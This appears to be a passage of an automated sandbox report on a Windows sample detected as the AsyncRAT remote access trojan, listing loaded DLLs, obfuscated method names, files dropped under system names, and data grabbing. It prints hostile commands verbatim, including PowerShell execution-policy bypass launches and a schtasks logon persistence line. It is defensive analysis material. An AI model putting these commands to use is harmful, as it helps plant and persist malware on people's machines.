                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeFile written: C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.iniJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: zrrHgsDzgS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: zrrHgsDzgS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: winload_prod.pdb source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: ntkrnlmp.pdb source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: winload_prod.pdb\ source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.15.dr, Temp.txt.28.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 7.2.svchost.exe.7450000.3.raw.unpack, kMtwg0o70HMbUjS709M9.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, kMtwg0o70HMbUjS709M9.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017F3AE0 push ebx; retf 7134h7_2_017F3BDA
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_017FD6B0 push es; ret 7_2_017FD6C0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075C9F90 push eax; iretd 7_2_075C9F91
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075C256B push cs; ret 7_2_075C256F
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075C1244 push ds; ret 7_2_075C1245
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075C1215 push ds; ret 7_2_075C1217
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075C12A4 push ds; ret 7_2_075C12A5
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_075C89EF push dword ptr [esp+ecx*2-75h]; ret 7_2_075C89F3
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_0761CD65 push EB076D30h; retf 7_2_0761CD6A
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_07610971 push es; ret 7_2_07610980
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076CDD10 pushad ; iretd 7_2_076CDD11
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076CCB52 pushfd ; ret 7_2_076CCB59
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_076CC8CB push ds; ret 7_2_076CC8F5
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_08176907 push eax; retf 7_2_0817690D
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 7_2_08177106 push esp; ret 7_2_08177109
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_05400538 push eax; ret 15_2_05400545
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0540E590 push es; ret 15_2_0540E5A0
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeCode function: 15_2_0540EC58 push esp; iretd 15_2_0540EC59
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050A0538 push eax; ret 28_2_050A0545
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeCode function: 28_2_050AEC58 push esp; iretd 28_2_050AEC59
                    Source: zrrHgsDzgS.exe, mDdWusHvKjN.csHigh entropy of concatenated method names: 'whNsRutPAVgWYIR', 'ZHAJfhfTdMeRATSc', 'cXwWRyDzuxp', 'fdbUiFSpvRBsW', 'rbrvcWQMTUecvVGozR', 'hwwZLyNLEsam', 'pMcNozYWlkyrwJI', 'iBXCqebzvyo', 'UHlfhfOzmiN', 'YwrdNNkfdjWXY'
                    Source: svchost.exe.0.dr, mDdWusHvKjN.csHigh entropy of concatenated method names: 'whNsRutPAVgWYIR', 'ZHAJfhfTdMeRATSc', 'cXwWRyDzuxp', 'fdbUiFSpvRBsW', 'rbrvcWQMTUecvVGozR', 'hwwZLyNLEsam', 'pMcNozYWlkyrwJI', 'iBXCqebzvyo', 'UHlfhfOzmiN', 'YwrdNNkfdjWXY'
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, mDdWusHvKjN.csHigh entropy of concatenated method names: 'whNsRutPAVgWYIR', 'ZHAJfhfTdMeRATSc', 'cXwWRyDzuxp', 'fdbUiFSpvRBsW', 'rbrvcWQMTUecvVGozR', 'hwwZLyNLEsam', 'pMcNozYWlkyrwJI', 'iBXCqebzvyo', 'UHlfhfOzmiN', 'YwrdNNkfdjWXY'
                    Source: 7.2.svchost.exe.7450000.3.raw.unpack, QisSSXoFjUNPRyebPKUc.csHigh entropy of concatenated method names: 'v87oFT0wtQ4', 'J5roFSvPCjR', 'joGoF4tyrXN', 'JRDoFdABYTM', 'j91oF7v1EOr', 'AYFoF1K6jGX', 'vTboFFZSGZp', 'Wj8oFGqlJpZ', 'TiroFk9Rur2', 'zTEoFMeJJRf'
                    Source: 7.2.svchost.exe.7450000.3.raw.unpack, Connection.csHigh entropy of concatenated method names: 'gTno7tNfvVQ', 'dr53PUohPCPIL68U61S7', 'l1dThaohAGMU1gnt8yNH', 'o1QodeniRPA', 'VQXodjO1FJN', 'k1LodKRNX6J', 'Ldmodwu6Zx7', 'GKuod0CLlVX', 'TFrodHTD5Be', 'UTvodDZfZbd'
                    Source: 7.2.svchost.exe.7450000.3.raw.unpack, kMtwg0o70HMbUjS709M9.csHigh entropy of concatenated method names: 'y2QsfpohB7Zf1Nl7XDHk', 'n6mGHaohJD7ITsIwSaF7', 'N2uo1v2XGV3', 'lnCHhaoBZ3pR9Ag4Ghr2', 'tkUIKToB2UnNqkWKgtAH', 'gg5AoLoBIYEvcUqSxruC', 'm65rVMoBgf1EuEv0SGBT', 'xJrXxtoBXB9dZOKOxuLv', 'mpM5QooBo71SoBKYglw3', 'sD0nIPoBuVdNCUJGy1Oi'
                    Source: 7.2.svchost.exe.7450000.3.raw.unpack, Y4YEPAoF6Ge9CZK1Z7MK.csHigh entropy of concatenated method names: 'ug4oN2aOqti', 'cWioNIYKiTn', 'DXioNgl28Qb', 'CqfoNX4SOGs', 'GwPoNo2a3AI', 'S41oNuQkqdX', 'l8boNYA8Kbu', 'wIloGIRWZO5', 'QJuoNbwxvZU', 'gCKoNW1bqLX'
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, QisSSXoFjUNPRyebPKUc.csHigh entropy of concatenated method names: 'v87oFT0wtQ4', 'J5roFSvPCjR', 'joGoF4tyrXN', 'JRDoFdABYTM', 'j91oF7v1EOr', 'AYFoF1K6jGX', 'vTboFFZSGZp', 'Wj8oFGqlJpZ', 'TiroFk9Rur2', 'zTEoFMeJJRf'
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, Connection.csHigh entropy of concatenated method names: 'gTno7tNfvVQ', 'dr53PUohPCPIL68U61S7', 'l1dThaohAGMU1gnt8yNH', 'o1QodeniRPA', 'VQXodjO1FJN', 'k1LodKRNX6J', 'Ldmodwu6Zx7', 'GKuod0CLlVX', 'TFrodHTD5Be', 'UTvodDZfZbd'
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, kMtwg0o70HMbUjS709M9.csHigh entropy of concatenated method names: 'y2QsfpohB7Zf1Nl7XDHk', 'n6mGHaohJD7ITsIwSaF7', 'N2uo1v2XGV3', 'lnCHhaoBZ3pR9Ag4Ghr2', 'tkUIKToB2UnNqkWKgtAH', 'gg5AoLoBIYEvcUqSxruC', 'm65rVMoBgf1EuEv0SGBT', 'xJrXxtoBXB9dZOKOxuLv', 'mpM5QooBo71SoBKYglw3', 'sD0nIPoBuVdNCUJGy1Oi'
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, Y4YEPAoF6Ge9CZK1Z7MK.csHigh entropy of concatenated method names: 'ug4oN2aOqti', 'cWioNIYKiTn', 'DXioNgl28Qb', 'CqfoNX4SOGs', 'GwPoNo2a3AI', 'S41oNuQkqdX', 'l8boNYA8Kbu', 'wIloGIRWZO5', 'QJuoNbwxvZU', 'gCKoNW1bqLX'

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\luglzv.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\udwnme.exeJump to dropped file

                    Boot Survival

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: zrrHgsDzgS.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                    Source: C:\Users\user\AppData\Roaming\svchost.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\2F074213E2D3902A2EA2 1A717C40FF7F60C18953B46A69A8FC47CCE7DAD6116CD3715DEB2ABF0D80722DJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
